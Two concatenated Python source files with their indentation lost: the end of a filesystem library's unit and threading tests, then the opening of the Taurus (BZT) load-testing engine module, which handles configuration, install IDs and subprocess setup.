self.fs.setcontents('a.txt', b('hello'))
self.fs.setcontents('b.txt', b('world'))
self.fs.makeopendir('foo').setcontents('c', b('123'))
self.fs.makeopendir('.svn').setcontents('ignored', b(''))
for dir_path, paths in self.fs.walk(dir_wildcard=lambda fn: not fn.endswith('.svn')):
for path in paths:
self.assertTrue('.svn' not in path)
def test_walkfiles(self):
self.fs.makeopendir('bar').setcontents('a.txt', b('123'))
self.fs.makeopendir('foo').setcontents('b', b('123'))
self.assertEqual(sorted(
self.fs.walkfiles()), ["/bar/a.txt", "/foo/b"])
self.assertEqual(sorted(self.fs.walkfiles(
dir_wildcard="*foo*")), ["/foo/b"])
self.assertEqual(sorted(self.fs.walkfiles(
wildcard="*.txt")), ["/bar/a.txt"])
def test_walkdirs(self):
self.fs.makeopendir('bar').setcontents('a.txt', b('123'))
self.fs.makeopendir('foo').makeopendir(
"baz").setcontents('b', b('123'))
self.assertEqual(sorted(self.fs.walkdirs()), [
"/", "/bar", "/foo", "/foo/baz"])
self.assertEqual(sorted(self.fs.walkdirs(
wildcard="*foo*")), ["/", "/foo", "/foo/baz"])
def test_unicode(self):
alpha = "\N{GREEK SMALL LETTER ALPHA}"
beta = "\N{GREEK SMALL LETTER BETA}"
self.fs.makedir(alpha)
self.fs.setcontents(alpha + "/a", b(''))
self.fs.setcontents(alpha + "/" + beta, b(''))
self.assertTrue(self.check(alpha))
self.assertEqual(sorted(self.fs.listdir(alpha)), ["a", beta])
def test_makedir(self):
check = self.check
self.fs.makedir("a")
self.assertTrue(check("a"))
self.assertRaises(
ParentDirectoryMissingError, self.fs.makedir, "a/b/c")
self.fs.makedir("a/b/c", recursive=True)
self.assertTrue(check("a/b/c"))
self.fs.makedir("foo/bar/baz", recursive=True)
self.assertTrue(check("foo/bar/baz"))
self.fs.makedir("a/b/child")
self.assertTrue(check("a/b/child"))
self.assertRaises(DestinationExistsError, self.fs.makedir, "/a/b")
self.fs.makedir("/a/b", allow_recreate=True)
self.fs.setcontents("/a/file", b(''))
self.assertRaises(ResourceInvalidError, self.fs.makedir, "a/file")
def test_remove(self):
self.fs.setcontents("a.txt", b(''))
self.assertTrue(self.check("a.txt"))
self.fs.remove("a.txt")
self.assertFalse(self.check("a.txt"))
self.assertRaises(ResourceNotFoundError, self.fs.remove, "a.txt")
self.fs.makedir("dir1")
self.assertRaises(ResourceInvalidError, self.fs.remove, "dir1")
self.fs.setcontents("/dir1/a.txt", b(''))
self.assertTrue(self.check("dir1/a.txt"))
self.fs.remove("dir1/a.txt")
self.assertFalse(self.check("/dir1/a.txt"))
def test_removedir(self):
check = self.check
self.fs.makedir("a")
self.assertTrue(check("a"))
self.fs.removedir("a")
self.assertRaises(ResourceNotFoundError, self.fs.removedir, "a")
self.assertTrue(not check("a"))
self.fs.makedir("a/b/c/d", recursive=True)
self.assertRaises(DirectoryNotEmptyError, self.fs.removedir, "a/b")
self.fs.removedir("a/b/c/d")
self.assertTrue(not check("a/b/c/d"))
self.fs.removedir("a/b/c")
self.assertTrue(not check("a/b/c"))
self.fs.removedir("a/b")
self.assertTrue(not check("a/b"))
# Test recursive removal of empty parent dirs
self.fs.makedir("foo/bar/baz", recursive=True)
self.fs.removedir("foo/bar/baz", recursive=True)
self.assertTrue(not check("foo/bar/baz"))
self.assertTrue(not check("foo/bar"))
self.assertTrue(not check("foo"))
self.fs.makedir("foo/bar/baz", recursive=True)
self.fs.setcontents("foo/file.txt", b("please don't delete me"))
self.fs.removedir("foo/bar/baz", recursive=True)
self.assertTrue(not check("foo/bar/baz"))
self.assertTrue(not check("foo/bar"))
self.assertTrue(check("foo/file.txt"))
# Ensure that force=True works as expected
self.fs.makedir("frollic/waggle", recursive=True)
self.fs.setcontents("frollic/waddle.txt", b("waddlewaddlewaddle"))
self.assertRaises(DirectoryNotEmptyError, self.fs.removedir, "frollic")
self.assertRaises(
ResourceInvalidError, self.fs.removedir, "frollic/waddle.txt")
self.fs.removedir("frollic", force=True)
self.assertTrue(not check("frollic"))
# Test removing unicode dirs
kappa = "\N{GREEK CAPITAL LETTER KAPPA}"
self.fs.makedir(kappa)
self.assertTrue(self.fs.isdir(kappa))
self.fs.removedir(kappa)
self.assertRaises(ResourceNotFoundError, self.fs.removedir, kappa)
self.assertTrue(not self.fs.isdir(kappa))
self.fs.makedir(pathjoin("test", kappa), recursive=True)
self.assertTrue(check(pathjoin("test", kappa)))
self.fs.removedir("test", force=True)
self.assertTrue(not check("test"))
def test_rename(self):
check = self.check
# test renaming a file in the same directory
self.fs.setcontents("foo.txt", b("Hello, World!"))
self.assertTrue(check("foo.txt"))
self.fs.rename("foo.txt", "bar.txt")
self.assertTrue(check("bar.txt"))
self.assertTrue(not check("foo.txt"))
# test renaming a directory in the same directory
self.fs.makedir("dir_a")
self.fs.setcontents("dir_a/test.txt", b("testerific"))
self.assertTrue(check("dir_a"))
self.fs.rename("dir_a", "dir_b")
self.assertTrue(check("dir_b"))
self.assertTrue(check("dir_b/test.txt"))
self.assertTrue(not check("dir_a/test.txt"))
self.assertTrue(not check("dir_a"))
# test renaming a file into a different directory
self.fs.makedir("dir_a")
self.fs.rename("dir_b/test.txt", "dir_a/test.txt")
self.assertTrue(not check("dir_b/test.txt"))
self.assertTrue(check("dir_a/test.txt"))
# test renaming a file into a non-existent directory
self.assertRaises(ParentDirectoryMissingError,
self.fs.rename, "dir_a/test.txt", "nonexistent/test.txt")
def test_info(self):
test_str = b("Hello, World!")
self.fs.setcontents("info.txt", test_str)
info = self.fs.getinfo("info.txt")
self.assertEqual(info['size'], len(test_str))
self.fs.desc("info.txt")
self.assertRaises(ResourceNotFoundError, self.fs.getinfo, "notafile")
self.assertRaises(
ResourceNotFoundError, self.fs.getinfo, "info.txt/inval")
def test_infokeys(self):
test_str = b("Hello, World!")
self.fs.setcontents("info.txt", test_str)
info = self.fs.getinfo("info.txt")
for k, v in info.items():
if not (k == 'asbytes' and callable(v)):
self.assertEqual(self.fs.getinfokeys('info.txt', k), {k: v})
test_info = {}
if 'modified_time' in info:
test_info['modified_time'] = info['modified_time']
if 'size' in info:
test_info['size'] = info['size']
self.assertEqual(self.fs.getinfokeys('info.txt', 'size', 'modified_time'), test_info)
self.assertEqual(self.fs.getinfokeys('info.txt', 'thiscantpossiblyexistininfo'), {})
def test_getsize(self):
test_str = b("*") * 23
self.fs.setcontents("info.txt", test_str)
size = self.fs.getsize("info.txt")
self.assertEqual(size, len(test_str))
def test_movefile(self):
check = self.check
contents = b(
"If the implementation is hard to explain, it's a bad idea.")
def makefile(path):
self.fs.setcontents(path, contents)
def checkcontents(path):
check_contents = self.fs.getcontents(path, "rb")
self.assertEqual(check_contents, contents)
return contents == check_contents
self.fs.makedir("foo/bar", recursive=True)
makefile("foo/bar/a.txt")
self.assertTrue(check("foo/bar/a.txt"))
self.assertTrue(checkcontents("foo/bar/a.txt"))
self.fs.move("foo/bar/a.txt", "foo/b.txt")
self.assertTrue(not check("foo/bar/a.txt"))
self.assertTrue(check("foo/b.txt"))
self.assertTrue(checkcontents("foo/b.txt"))
self.fs.move("foo/b.txt", "c.txt")
self.assertTrue(not check("foo/b.txt"))
self.assertTrue(check("/c.txt"))
self.assertTrue(checkcontents("/c.txt"))
makefile("foo/bar/a.txt")
self.assertRaises(
DestinationExistsError, self.fs.move, "foo/bar/a.txt", "/c.txt")
self.assertTrue(check("foo/bar/a.txt"))
self.assertTrue(check("/c.txt"))
self.fs.move("foo/bar/a.txt", "/c.txt", overwrite=True)
self.assertTrue(not check("foo/bar/a.txt"))
self.assertTrue(check("/c.txt"))
def test_movedir(self):
check = self.check
contents = b(
"If the implementation is hard to explain, it's a bad idea.")
def makefile(path):
self.fs.setcontents(path, contents)
self.assertRaises(ResourceNotFoundError, self.fs.movedir, "a", "b")
self.fs.makedir("a")
self.fs.makedir("b")
makefile("a/1.txt")
makefile("a/2.txt")
makefile("a/3.txt")
self.fs.makedir("a/foo/bar", recursive=True)
makefile("a/foo/bar/baz.txt")
self.fs.movedir("a", "copy of a")
self.assertTrue(self.fs.isdir("copy of a"))
self.assertTrue(check("copy of a/1.txt"))
self.assertTrue(check("copy of a/2.txt"))
self.assertTrue(check("copy of a/3.txt"))
self.assertTrue(check("copy of a/foo/bar/baz.txt"))
self.assertTrue(not check("a/1.txt"))
self.assertTrue(not check("a/2.txt"))
self.assertTrue(not check("a/3.txt"))
self.assertTrue(not check("a/foo/bar/baz.txt"))
self.assertTrue(not check("a/foo/bar"))
self.assertTrue(not check("a/foo"))
self.assertTrue(not check("a"))
self.fs.makedir("a")
self.assertRaises(
DestinationExistsError, self.fs.movedir, "copy of a", "a")
self.fs.movedir("copy of a", "a", overwrite=True)
self.assertTrue(not check("copy of a"))
self.assertTrue(check("a/1.txt"))
self.assertTrue(check("a/2.txt"))
self.assertTrue(check("a/3.txt"))
self.assertTrue(check("a/foo/bar/baz.txt"))
def test_cant_copy_from_os(self):
sys_executable = os.path.abspath(os.path.realpath(sys.executable))
self.assertRaises(FSError, self.fs.copy, sys_executable, "py.exe")
def test_copyfile(self):
check = self.check
contents = b(
"If the implementation is hard to explain, it's a bad idea.")
def makefile(path, contents=contents):
self.fs.setcontents(path, contents)
def checkcontents(path, contents=contents):
check_contents = self.fs.getcontents(path, "rb")
self.assertEqual(check_contents, contents)
return contents == check_contents
self.fs.makedir("foo/bar", recursive=True)
makefile("foo/bar/a.txt")
self.assertTrue(check("foo/bar/a.txt"))
self.assertTrue(checkcontents("foo/bar/a.txt"))
# import rpdb2; rpdb2.start_embedded_debugger('password');
self.fs.copy("foo/bar/a.txt", "foo/b.txt")
self.assertTrue(check("foo/bar/a.txt"))
self.assertTrue(check("foo/b.txt"))
self.assertTrue(checkcontents("foo/bar/a.txt"))
self.assertTrue(checkcontents("foo/b.txt"))
self.fs.copy("foo/b.txt", "c.txt")
self.assertTrue(check("foo/b.txt"))
self.assertTrue(check("/c.txt"))
self.assertTrue(checkcontents("/c.txt"))
makefile("foo/bar/a.txt", b("different contents"))
self.assertTrue(checkcontents("foo/bar/a.txt", b("different contents")))
self.assertRaises(
DestinationExistsError, self.fs.copy, "foo/bar/a.txt", "/c.txt")
self.assertTrue(checkcontents("/c.txt"))
self.fs.copy("foo/bar/a.txt", "/c.txt", overwrite=True)
self.assertTrue(checkcontents("foo/bar/a.txt", b("different contents")))
self.assertTrue(checkcontents("/c.txt", b("different contents")))
def test_copydir(self):
check = self.check
contents = b(
"If the implementation is hard to explain, it's a bad idea.")
def makefile(path):
self.fs.setcontents(path, contents)
def checkcontents(path):
check_contents = self.fs.getcontents(path)
self.assertEqual(check_contents, contents)
return contents == check_contents
self.fs.makedir("a")
self.fs.makedir("b")
makefile("a/1.txt")
makefile("a/2.txt")
makefile("a/3.txt")
self.fs.makedir("a/foo/bar", recursive=True)
makefile("a/foo/bar/baz.txt")
self.fs.copydir("a", "copy of a")
self.assertTrue(check("copy of a/1.txt"))
self.assertTrue(check("copy of a/2.txt"))
self.assertTrue(check("copy of a/3.txt"))
self.assertTrue(check("copy of a/foo/bar/baz.txt"))
checkcontents("copy of a/1.txt")
self.assertTrue(check("a/1.txt"))
self.assertTrue(check("a/2.txt"))
self.assertTrue(check("a/3.txt"))
self.assertTrue(check("a/foo/bar/baz.txt"))
checkcontents("a/1.txt")
self.assertRaises(DestinationExistsError, self.fs.copydir, "a", "b")
self.fs.copydir("a", "b", overwrite=True)
self.assertTrue(check("b/1.txt"))
self.assertTrue(check("b/2.txt"))
self.assertTrue(check("b/3.txt"))
self.assertTrue(check("b/foo/bar/baz.txt"))
checkcontents("b/1.txt")
def test_copydir_with_dotfile(self):
check = self.check
contents = b(
"If the implementation is hard to explain, it's a bad idea.")
def makefile(path):
self.fs.setcontents(path, contents)
self.fs.makedir("a")
makefile("a/1.txt")
makefile("a/2.txt")
makefile("a/.hidden.txt")
self.fs.copydir("a", "copy of a")
self.assertTrue(check("copy of a/1.txt"))
self.assertTrue(check("copy of a/2.txt"))
self.assertTrue(check("copy of a/.hidden.txt"))
self.assertTrue(check("a/1.txt"))
self.assertTrue(check("a/2.txt"))
self.assertTrue(check("a/.hidden.txt"))
def test_readwriteappendseek(self):
def checkcontents(path, check_contents):
read_contents = self.fs.getcontents(path, "rb")
self.assertEqual(read_contents, check_contents)
return read_contents == check_contents
test_strings = [b("Beautiful is better than ugly."),
b("Explicit is better than implicit."),
b("Simple is better than complex.")]
all_strings = b("").join(test_strings)
self.assertRaises(ResourceNotFoundError, self.fs.open, "a.txt", "r")
self.assertTrue(not self.fs.exists("a.txt"))
f1 = self.fs.open("a.txt", "wb")
pos = 0
for s in test_strings:
f1.write(s)
pos += len(s)
self.assertEqual(pos, f1.tell())
f1.close()
self.assertTrue(self.fs.exists("a.txt"))
self.assertTrue(checkcontents("a.txt", all_strings))
f2 = self.fs.open("b.txt", "wb")
f2.write(test_strings[0])
f2.close()
self.assertTrue(checkcontents("b.txt", test_strings[0]))
f3 = self.fs.open("b.txt", "ab")
# On win32, tell() gives zero until you actually write to the file
# self.assertEquals(f3.tell(),len(test_strings[0]))
f3.write(test_strings[1])
self.assertEqual(f3.tell(), len(test_strings[0])+len(test_strings[1]))
f3.write(test_strings[2])
self.assertEqual(f3.tell(), len(all_strings))
f3.close()
self.assertTrue(checkcontents("b.txt", all_strings))
f4 = self.fs.open("b.txt", "wb")
f4.write(test_strings[2])
f4.close()
self.assertTrue(checkcontents("b.txt", test_strings[2]))
f5 = self.fs.open("c.txt", "wb")
for s in test_strings:
f5.write(s+b("\n"))
f5.close()
f6 = self.fs.open("c.txt", "rb")
for s, t in zip(f6, test_strings):
self.assertEqual(s, t+b("\n"))
f6.close()
f7 = self.fs.open("c.txt", "rb")
f7.seek(13)
word = f7.read(6)
self.assertEqual(word, b("better"))
f7.seek(1, os.SEEK_CUR)
word = f7.read(4)
self.assertEqual(word, b("than"))
f7.seek(-9, os.SEEK_END)
word = f7.read(7)
self.assertEqual(word, b("complex"))
f7.close()
self.assertEqual(self.fs.getcontents("a.txt", "rb"), all_strings)
def test_truncate(self):
def checkcontents(path, check_contents):
read_contents = self.fs.getcontents(path, "rb")
self.assertEqual(read_contents, check_contents)
return read_contents == check_contents
self.fs.setcontents("hello", b("world"))
checkcontents("hello", b("world"))
self.fs.setcontents("hello", b("hi"))
checkcontents("hello", b("hi"))
self.fs.setcontents("hello", b("1234567890"))
checkcontents("hello", b("1234567890"))
with self.fs.open("hello", "rb+") as f:
f.truncate(7)
checkcontents("hello", b("1234567"))
with self.fs.open("hello", "rb+") as f:
f.seek(5)
f.truncate()
checkcontents("hello", b("12345"))
def test_truncate_to_larger_size(self):
with self.fs.open("hello", "wb") as f:
f.truncate(30)
self.assertEqual(self.fs.getsize("hello"), 30)
# Some file systems (FTPFS) don't support both reading and writing
if self.fs.getmeta('file.read_and_write', True):
with self.fs.open("hello", "rb+") as f:
f.seek(25)
f.write(b("123456"))
with self.fs.open("hello", "rb") as f:
f.seek(25)
self.assertEqual(f.read(), b("123456"))
def test_write_past_end_of_file(self):
if self.fs.getmeta('file.read_and_write', True):
with self.fs.open("write_at_end", "wb") as f:
f.seek(25)
f.write(b("EOF"))
with self.fs.open("write_at_end", "rb") as f:
self.assertEqual(f.read(), b("\x00")*25 + b("EOF"))
def test_with_statement(self):
contents = b"testing the with statement"
# A successful 'with' statement
with self.fs.open('f.txt','wb-') as testfile:
testfile.write(contents)
self.assertEqual(self.fs.getcontents('f.txt', 'rb'), contents)
# A 'with' statement raising an error
def with_error():
with self.fs.open('g.txt','wb-') as testfile:
testfile.write(contents)
raise ValueError
self.assertRaises(ValueError, with_error)
self.assertEqual(self.fs.getcontents('g.txt', 'rb'), contents)
def test_pickling(self):
if self.fs.getmeta('pickle_contents', True):
self.fs.setcontents("test1", b("hello world"))
fs2 = pickle.loads(pickle.dumps(self.fs))
self.assertTrue(fs2.isfile("test1"))
fs3 = pickle.loads(pickle.dumps(self.fs, -1))
self.assertTrue(fs3.isfile("test1"))
else:
# Just make sure it doesn't throw an exception
fs2 = pickle.loads(pickle.dumps(self.fs))
def test_big_file(self):
"""Test handling of a big file (1MB)"""
chunk_size = 1024 * 256
num_chunks = 4
def chunk_stream():
"""Generate predictable-but-randomy binary content."""
r = random.Random(0)
randint = r.randint
int2byte = six.int2byte
for _i in range(num_chunks):
c = b("").join(int2byte(randint(
0, 255)) for _j in range(chunk_size//8))
yield c * 8
f = self.fs.open("bigfile", "wb")
try:
for chunk in chunk_stream():
f.write(chunk)
finally:
f.close()
chunks = chunk_stream()
f = self.fs.open("bigfile", "rb")
try:
try:
while True:
if next(chunks) != f.read(chunk_size):
assert False, "bigfile was corrupted"
except StopIteration:
if f.read() != b(""):
assert False, "bigfile was corrupted"
finally:
f.close()
def test_settimes(self):
def cmp_datetimes(d1, d2):
"""Test datetime objects are the same to within the timestamp accuracy"""
dts1 = time.mktime(d1.timetuple())
dts2 = time.mktime(d2.timetuple())
return int(dts1) == int(dts2)
d1 = datetime.datetime(2010, 6, 20, 11, 0, 9, 987699)
d2 = datetime.datetime(2010, 7, 5, 11, 0, 9, 500000)
self.fs.setcontents('/dates.txt', b('check dates'))
# If the implementation supports settimes, check that the times
# can be set and then retrieved
try:
self.fs.settimes('/dates.txt', d1, d2)
except UnsupportedError:
pass
else:
info = self.fs.getinfo('/dates.txt')
self.assertTrue(cmp_datetimes(d1, info['accessed_time']))
self.assertTrue(cmp_datetimes(d2, info['modified_time']))
def test_removeroot(self):
self.assertRaises(RemoveRootError, self.fs.removedir, "/")
def test_zero_read(self):
"""Test read(0) returns empty string"""
self.fs.setcontents('foo.txt', b('Hello, World'))
with self.fs.open('foo.txt', 'rb') as f:
self.assertTrue(len(f.read(0)) == 0)
with self.fs.open('foo.txt', 'rt') as f:
self.assertTrue(len(f.read(0)) == 0)
# May be disabled - see end of file
class ThreadingTestCases(object):
"""Testcases for thread-safety of FS implementations."""
# These are either too slow to be worth repeating,
# or cannot possibly break cross-thread.
_dont_retest = ("test_pickling", "test_multiple_overwrite",)
__lock = threading.RLock()
def _yield(self):
# time.sleep(0.001)
# Yields without a delay
time.sleep(0)
def _lock(self):
self.__lock.acquire()
def _unlock(self):
self.__lock.release()
def _makeThread(self, func, errors):
def runThread():
try:
func()
except Exception:
errors.append(sys.exc_info())
thread = threading.Thread(target=runThread)
thread.daemon = True
return thread
def _runThreads(self, *funcs):
check_interval = sys.getcheckinterval()
sys.setcheckinterval(1)
try:
errors = []
threads = [self._makeThread(f, errors) for f in funcs]
for t in threads:
t.start()
for t in threads:
t.join()
for (c, e, t) in errors:
raise e.with_traceback(t)
finally:
sys.setcheckinterval(check_interval)
def test_setcontents_threaded(self):
def setcontents(name, contents):
f = self.fs.open(name, "wb")
self._yield()
try:
f.write(contents)
self._yield()
finally:
f.close()
def thread1():
c = b("thread1 was 'ere")
setcontents("thread1.txt", c)
self.assertEqual(self.fs.getcontents("thread1.txt", 'rb'), c)
def thread2():
c = b("thread2 was 'ere")
setcontents("thread2.txt", c)
self.assertEqual(self.fs.getcontents("thread2.txt", 'rb'), c)
self._runThreads(thread1, thread2)
def test_setcontents_threaded_samefile(self):
def setcontents(name, contents):
f = self.fs.open(name, "wb")
self._yield()
try:
f.write(contents)
self._yield()
finally:
f.close()
def thread1():
c = b("thread1 was 'ere")
setcontents("threads.txt", c)
self._yield()
self.assertEqual(self.fs.listdir("/"), ["threads.txt"])
def thread2():
c = b("thread2 was 'ere")
setcontents("threads.txt", c)
self._yield()
self.assertEqual(self.fs.listdir("/"), ["threads.txt"])
def thread3():
c = b("thread3 was 'ere")
setcontents("threads.txt", c)
self._yield()
self.assertEqual(self.fs.listdir("/"), ["threads.txt"])
try:
self._runThreads(thread1, thread2, thread3)
except ResourceLockedError:
# that's ok, some implementations don't support concurrent writes
pass
def test_cases_in_separate_dirs(self):
class TestCases_in_subdir(self.__class__, unittest.TestCase):
"""Run all testcases against a subdir of self.fs"""
def __init__(this, subdir):
super(TestCases_in_subdir, this).__init__("test_listdir")
this.subdir = subdir
for meth in dir(this):
if not meth.startswith("test_"):
continue
if meth in self._dont_retest:
continue
if not hasattr(FSTestCases, meth):
continue
if self.fs.exists(subdir):
self.fs.removedir(subdir, force=True)
self.assertFalse(self.fs.isdir(subdir))
self.assertTrue(self.fs.isdir("/"))
self.fs.makedir(subdir)
self._yield()
getattr(this, meth)()
@property
def fs(this):
return self.fs.opendir(this.subdir)
def check(this, p):
return self.check(pathjoin(this.subdir, relpath(p)))
def thread1():
TestCases_in_subdir("thread1")
def thread2():
TestCases_in_subdir("thread2")
def thread3():
TestCases_in_subdir("thread3")
self._runThreads(thread1, thread2, thread3)
def test_makedir_winner(self):
errors = []
def makedir():
try:
self.fs.makedir("testdir")
except DestinationExistsError as e:
errors.append(e)
def makedir_noerror():
try:
self.fs.makedir("testdir", allow_recreate=True)
except DestinationExistsError as e:
errors.append(e)
def removedir():
try:
self.fs.removedir("testdir")
except (ResourceNotFoundError, ResourceLockedError) as e:
errors.append(e)
# One thread should succeed, one should error
self._runThreads(makedir, makedir)
self.assertEqual(len(errors), 1)
self.fs.removedir("testdir")
# One thread should succeed, two should error
errors = []
self._runThreads(makedir, makedir, makedir)
if len(errors) != 2:
raise AssertionError(errors)
self.fs.removedir("testdir")
# All threads should succeed
errors = []
self._runThreads(makedir_noerror, makedir_noerror, makedir_noerror)
self.assertEqual(len(errors), 0)
self.assertTrue(self.fs.isdir("testdir"))
self.fs.removedir("testdir")
# makedir() can beat removedir() and vice-versa
errors = []
self._runThreads(makedir, removedir)
if self.fs.isdir("testdir"):
self.assertEqual(len(errors), 1)
self.assertFalse(isinstance(errors[0], DestinationExistsError))
self.fs.removedir("testdir")
else:
self.assertEqual(len(errors), 0)
def test_concurrent_copydir(self):
self.fs.makedir("a")
self.fs.makedir("a/b")
self.fs.setcontents("a/hello.txt", b("hello world"))
self.fs.setcontents("a/guido.txt", b("is a space alien"))
self.fs.setcontents("a/b/parrot.txt", b("pining for the fiords"))
def copydir():
self._yield()
self.fs.copydir("a", "copy of a")
def copydir_overwrite():
self._yield()
self.fs.copydir("a", "copy of a", overwrite=True)
# This should error out since we're not overwriting
self.assertRaises(
DestinationExistsError, self._runThreads, copydir, copydir)
self.assertTrue(self.fs.isdir('a'))
self.assertTrue(self.fs.isdir('a'))
copydir_overwrite()
self.assertTrue(self.fs.isdir('a'))
# This should run to completion and give a valid state, unless
# files get locked when written to.
try:
self._runThreads(copydir_overwrite, copydir_overwrite)
except ResourceLockedError:
pass
self.assertTrue(self.fs.isdir("copy of a"))
self.assertTrue(self.fs.isdir("copy of a/b"))
self.assertEqual(self.fs.getcontents(
"copy of a/b/parrot.txt", 'rb'), b("pining for the fiords"))
self.assertEqual(self.fs.getcontents(
"copy of a/hello.txt", 'rb'), b("hello world"))
self.assertEqual(self.fs.getcontents(
"copy of a/guido.txt", 'rb'), b("is a space alien"))
def test_multiple_overwrite(self):
contents = [b("contents one"), b(
"contents the second"), b("number three")]
def thread1():
for i in range(30):
for c in contents:
self.fs.setcontents("thread1.txt", c)
self.assertEqual(self.fs.getsize("thread1.txt"), len(c))
self.assertEqual(self.fs.getcontents(
"thread1.txt", 'rb'), c)
def thread2():
for i in range(30):
for c in contents:
self.fs.setcontents("thread2.txt", c)
self.assertEqual(self.fs.getsize("thread2.txt"), len(c))
self.assertEqual(self.fs.getcontents(
"thread2.txt", 'rb'), c)
self._runThreads(thread1, thread2)
# Uncomment to temporarily disable threading tests
# class ThreadingTestCases(object):
# _dont_retest = ()
|
engine.py
|
"""
Main BZT classes
Copyright 2015 BlazeMeter Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import codecs
import copy
import datetime
import json
import logging
import os
import pkgutil
import shutil
import sys
import threading
import time
import traceback
import uuid
from distutils.version import LooseVersion
from urllib import parse
from bzt import ManualShutdown, get_configs_dir, TaurusConfigError, TaurusInternalException
from bzt.utils import reraise, load_class, BetterDict, ensure_is_dict, dehumanize_time, is_windows, is_linux, temp_file
from bzt.utils import shell_exec, get_full_path, ExceptionalDownloader, get_uniq_name, HTTPClient, Environment
from bzt.utils import NETWORK_PROBLEMS
from .dicts import Configuration
from .modules import Provisioning, Reporter, Service, Aggregator, EngineModule
from .names import EXEC, TAURUS_ARTIFACTS_DIR, SETTINGS
from .templates import Singletone
from ..environment_helpers import expand_variable_with_os, custom_expandvars, expand_envs_with_os
from bzt.resources.version import VERSION, DEV_VERSION
class Engine(object):
"""
Core entity of the technology, used to coordinate whole process
:type reporters: list[Reporter]
    :type services: list[Service]
:type log: logging.Logger
:type aggregator: bzt.modules.aggregator.ConsolidatingAggregator
:type stopping_reason: BaseException
"""
ARTIFACTS_DIR = "%Y-%m-%d_%H-%M-%S.%f"
def __init__(self, parent_logger):
"""
:type parent_logger: logging.Logger
"""
self.file_search_paths = []
self.services = []
self.__artifacts = []
self.reporters = []
self.artifacts_dir = None
self.log = parent_logger.getChild(self.__class__.__name__)
self.env = Environment(self.log) # backward compatibility
self.shared_env = Environment(self.log) # backward compatibility
self.config = Configuration()
self.config.log = self.log.getChild(Configuration.__name__)
self.modules = {} # available modules
self.provisioning = Provisioning()
self.aggregator = Aggregator(is_functional=False)
self.aggregator.engine = self
self.interrupted = False
self.check_interval = 1
self.stopping_reason = None
self.engine_loop_utilization = 0
self.prepared = []
self.started = []
self.default_cwd = None
self.logging_level_down = lambda: None
self.logging_level_up = lambda: None
self.user_pythonpath = None
self.temp_pythonpath = None
self._http_client = None
self.graceful_tmp = None
def set_pythonpath(self):
version = sys.version.split(' ')[0]
path_suffix = os.path.join('python-packages', version)
self.user_pythonpath = get_full_path(os.path.join("~", ".bzt", path_suffix))
self.temp_pythonpath = get_full_path(os.path.join(self.artifacts_dir, path_suffix))
current_pythonpath = os.environ.get('PYTHONPATH', '')
paths = self.user_pythonpath, self.temp_pythonpath, current_pythonpath
self.log.debug("Set PYTHONPATH to :\n\tUSER: '{}' +\n\tTEMP: '{}' +\n\tCURRENT: '{}'".format(*paths))
try:
user_packages = os.listdir(self.user_pythonpath)
except:
user_packages = []
self.log.debug("Content of user packages dir: {}".format(user_packages))
os.environ['PYTHONPATH'] = os.pathsep.join(paths)
def configure(self, user_configs, read_config_files=True):
"""
Load configuration files
:type user_configs: list[str]
:type read_config_files: bool
"""
self.log.info("Configuring...")
if read_config_files:
self._load_base_configs()
merged_config = self._load_user_configs(user_configs)
all_includes = []
while "included-configs" in self.config:
includes = self.config.pop("included-configs")
included_configs = [self.find_file(conf) for conf in includes if conf not in all_includes + user_configs]
all_includes += includes
self.config.load(included_configs)
self.config['included-configs'] = all_includes
self.config.merge({"version": VERSION})
self.get_http_client()
if self.config.get(SETTINGS).get("check-updates", True):
install_id = self.config.get("install-id", self._generate_id())
def wrapper():
return self._check_updates(install_id)
thread = threading.Thread(target=wrapper) # intentionally non-daemon thread
thread.start()
return merged_config
def unify_config(self):
executions = self.config.get(EXEC, [])
if isinstance(executions, dict):
executions = [executions]
self.config[EXEC] = executions
settings = self.config.get(SETTINGS)
default_executor = settings.get("default-executor", None)
prov_type = self.config.get(Provisioning.PROV)
for execution in executions: # type: BetterDict
executor = execution.get("executor", default_executor, force_set=True)
if not executor:
msg = "Cannot determine executor type and no default executor in %s"
raise TaurusConfigError(msg % execution)
reporting = self.config.get(Reporter.REP, [])
for index in range(len(reporting)):
ensure_is_dict(reporting, index, "module")
services = self.config.get(Service.SERV, [])
for index in range(len(services)):
ensure_is_dict(services, index, "module")
modules = self.config.get("modules")
for module in modules:
ensure_is_dict(modules, module, "class")
@staticmethod
def _generate_id():
if os.getenv("JENKINS_HOME"):
prefix = "jenkins"
elif os.getenv("TRAVIS"):
prefix = "travis"
elif any([key.startswith("bamboo") for key in os.environ.keys()]):
prefix = "bamboo"
elif os.getenv("TEAMCITY_VERSION"):
prefix = "teamcity"
elif os.getenv("DOCKER_HOST"):
prefix = "docker"
elif os.getenv("AWS_"):
prefix = "amazon"
elif os.getenv("GOOGLE_APPLICATION_CREDENTIALS") or os.getenv("CLOUDSDK_CONFIG"):
prefix = "google_cloud"
elif os.getenv("WEBJOBS_NAME"):
prefix = "azure"
elif is_linux():
prefix = 'linux'
elif is_windows():
prefix = 'windows'
else:
prefix = 'macos'
return "%s-%x" % (prefix, uuid.getnode())
def prepare(self):
"""
        Prepare the engine for work; prepares Provisioning and the other
        downstream EngineModule instances (aggregator, services, reporters)
"""
self.log.info("Preparing...")
self.unify_config()
interval = self.config.get(SETTINGS).get("check-interval", self.check_interval)
self.check_interval = dehumanize_time(interval)
try:
self.__prepare_aggregator()
self.__prepare_services()
self.__prepare_provisioning()
self.__prepare_reporters()
self.config.dump()
except BaseException as exc:
self.stopping_reason = exc
raise
def _startup(self):
modules = self.services + [self.aggregator] + self.reporters + [self.provisioning] # order matters
for module in modules:
self.log.debug("Startup %s", module)
self.started.append(module)
module.startup()
self.config.dump()
def start_subprocess(self, args, env, cwd=None, **kwargs):
if cwd is None:
cwd = self.default_cwd
self.graceful_tmp = self.create_artifact(prefix="GRACEFUL", suffix="")
env = env.get()
env['GRACEFUL'] = self.graceful_tmp
return shell_exec(args, cwd=cwd, env=env, **kwargs)
def run(self):
"""
Run the job. Calls `startup`, does periodic `check`,
calls `shutdown` in any case
"""
self.log.info("Starting...")
exc_info = exc_value = None
try:
self._startup()
self.logging_level_down()
self._wait()
except BaseException as exc:
self.log.debug("%s:\n%s", exc, traceback.format_exc())
if not self.stopping_reason:
